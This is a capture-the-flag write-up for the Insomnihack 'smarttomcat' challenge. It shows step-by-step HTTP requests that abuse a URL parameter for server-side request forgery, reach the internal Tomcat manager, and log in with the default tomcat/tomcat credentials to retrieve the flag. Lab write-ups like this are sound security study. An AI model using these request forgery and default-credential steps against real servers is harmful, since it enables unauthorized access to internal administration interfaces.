Rating:
>Normal, regular cats are so 2000 and late, I decided to buy this allegedly smart tomcat robot
Now the damn thing has attacked me and flew away. I can't even seem to track it down on the broken search interface... Can you help me ?
[Search interface](http://smarttomcat.teaser.insomnihack.ch/)
This is a simple challenge.
We have a web application to locate places from coordinates. A standard request would look like this:
```
POST /index.php HTTP/1.1
Host: smarttomcat.teaser.insomnihack.ch
u=http://localhost:8080/index.jsp?x=1%26y=2
```
We try
```
POST /index.php HTTP/1.1
Host: smarttomcat.teaser.insomnihack.ch
u=http://localhost:8080/zzz
```
and get:
```
<html><head><title>Apache Tomcat/7.0.68 (Ubuntu) - Error report</title><style></style> </head><body><h1>HTTP Status 404 - /zzz</h1><HR size="1" noshade="noshade">
type Status report
message /zzz
description The requested resource is not available.
<HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.68 (Ubuntu)</h3></body></html>Now let's try to read the contents of the Manager page
```
POST /index.php HTTP/1.1
Host: smarttomcat.teaser.insomnihack.ch
u=http://localhost:8080/manager/html
```
The response is
```
<html><head><title>Apache Tomcat/7.0.68 (Ubuntu) - Error report</title><style></style> </head><body><h1>HTTP Status 401 - </h1><HR size="1" noshade="noshade">
type Status report
message
description This request requires HTTP authentication.
<HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.68 (Ubuntu)</h3></body></html>This application requires login, we know that tomcat uses the basic authent and the credential can be [passed in URL] (http://serverfault.com/questions/371907/can-you-pass-user-pass-for- http-basic-authentication-in-url-parameters). With a little luck, I found the account is `tomcat / tomcat`
```
POST /index.php HTTP/1.1
Host: smarttomcat.teaser.insomnihack.ch
u=http://tomcat:tomcat@localhost:8080/manager/html
```
and we got the flag
```
We won't give you the manager, but you can have the flag : INS{th1s_is_re4l_w0rld_pent3st}
```
